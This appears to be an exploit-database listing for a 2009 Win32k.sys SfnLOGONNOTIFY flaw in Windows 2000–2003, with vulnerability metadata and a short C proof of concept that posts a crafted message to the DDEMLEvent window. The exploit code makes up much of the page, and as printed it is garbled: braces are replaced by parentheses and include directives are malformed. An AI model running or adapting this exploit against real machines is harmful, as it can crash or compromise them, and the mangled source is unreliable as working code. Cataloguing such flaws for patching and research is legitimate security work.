Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln

vendor:

Windows

by:

MJ0011

7,2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: Windows

Affected Version From: Microsoft Windows 2000

Affected Version To: Windows 2003

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln

A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.

Mitigation:

Apply the latest security patches from Microsoft.

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/39630/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.

Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue. 
*/

# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");
 
getchar();
 
HWND hwnd = FindWindow ("DDEMLEvent", NULL);
 
if (hwnd == 0)
(
   printf ("cannot find DDEMLEvent Window! \ n");
   return 0;
)
 
PostMessage (hwnd, 0x4c, 0x4, 0x80000000);
 
 
return 0;
)